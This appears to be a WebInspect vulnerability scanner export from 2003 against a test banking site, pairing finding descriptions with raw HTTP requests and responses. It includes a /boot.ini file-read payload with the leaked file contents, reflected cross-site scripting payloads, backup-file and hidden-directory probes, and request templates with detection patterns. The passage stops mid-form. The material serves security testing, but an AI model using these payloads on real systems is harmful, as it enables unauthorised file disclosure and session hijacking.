Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 104
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=/boot.iniHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:42 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 309
Content-Type: text/html
Cache-control: private
<html>
<body>
[boot loader]timeout=30default=multi(0)disk(0)rdisk(0)partition(3)\WINNT[operating systems]multi(0)disk(0)rdisk(0)partition(3)\WINNT="Microsoft Windows 2000 Server" /fastdetectmulti(0)disk(0)rdisk(0)partition(2)\WINNT="Microsoft Windows 2000 Professional" /fastdetect
</body>
</html>
File Source Disclosure (Path Parameter - boot.ini)Remote file viewing on the system is possible due to
the script returning the contents of any filename passed to
it.<BR><BR><b>Example:</b><BR>A script usually has 3 parts:
<OL>
<LI>The name of the script (article.cgi).
<li>The parameter of the script (article.cgi?page=).
<LI>The value of the parameter (article.cgi?page=5).
</OL>
By passing a value of /boot.ini to the parameter an
attacker can remotely view the file source. An attacker can then use this to
retrieve source code for scripts and get access to usernames and passwords and
sensitive information.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 104
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=<attack>/boot.ini</attack>\[boot\sloader\]GET /cgi-bin/ikonboard/help.cgi.bak HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:51:08 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:01 GMT
ETag: "e4b0def8a9dc11:8f6"
Content-Length: 12
bleh exploitBackup File (Appended .bak)A backup file with the extension .bak was found on the server. Often, old files are renamed with such an extension to distinguish them from production files. However, the source code for old files that have been renamed in this manner and left in the webroot can often be retrieved.GET /cgi-bin/ikonboard/help.cgi<attack>.bak</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
200 |Content-Type:\stext/plain |Content-Type:\sapplication/octet-stream POST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=>"><script>alert("XSS")</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 186
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was >"><script>alert("XSS")</script>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/testing/
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=<attack>>"><script>alert("XSS")</script></attack><script>alert\("XSS"\)<\/script>GET /CVS/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:56 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (CVS)<B>Found Directory:</B> /CVS/Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /_vti_bin/DocURL.indexOf( HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_bin/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 401 Access Denied
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Content-Length: 4431
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>You are not authorized to view this page</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->You are not authorized to view this page</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">You do not have permission to view this directory or page using the credentials you supplied.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Click the <a href="javascript:location.reload()">Refresh</a> button to try again with different credentials.</li>
<li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page.</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 401.2 - Unauthorized: Logon failed due to server configuration<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Background:<br>
This is usually caused by a server-side script not sending the proper WWW-Authenticate header field. Using Active Server Pages scripting this is done by using the <strong>AddHeader</strong> method of the <strong>Response</strong> object to request that the client use a certain authentication method to access the resource.
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=401.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li>
</p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/_vti_bin/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /_vti_cnf/.FBCIndex HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:50:38 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
OSX Content File (FBCIndex)By exploiting the case-insensitivity of HFS+, an attacker can evade Apache's access controls.
Using mod_hfs (which takes care of case-insensitivity in directory names) and using < FilesMatch> (with well-chosen regular expressions) instead of < Files> directives (to take care of case-insensitivity in filenames), we can "cure" the case-insensitivity problem and restore Apache's access controls. <br><br>
However, there is another problem lurking. A vulnerability has been found that allows remote attackers to list the content of the directory and view the index file created for those files by requesting an a special file that automatically created by Mac OS X.GET /_vti_cnf/<attack>.FBCIndex</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
40[13] |200 |Bud2GET /db/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:59 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (db)<B>Found Directory:</B> /db/ <p>
This directory contains database files, log files, or information about servers and possibly people on this server.Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /plink.asp?a=b&c=--><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 197
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = --><script>alert('XSS')</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?a=b&c=<attack>--><script>alert('XSS')</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>GET /plink.asp?a=b&c=>"><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 197
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = >"><script>alert('XSS')</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?a=b&c=<attack>>"><script>alert('XSS')</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=>"'><img%20src="javascript:alert('XSS')">&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:39 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
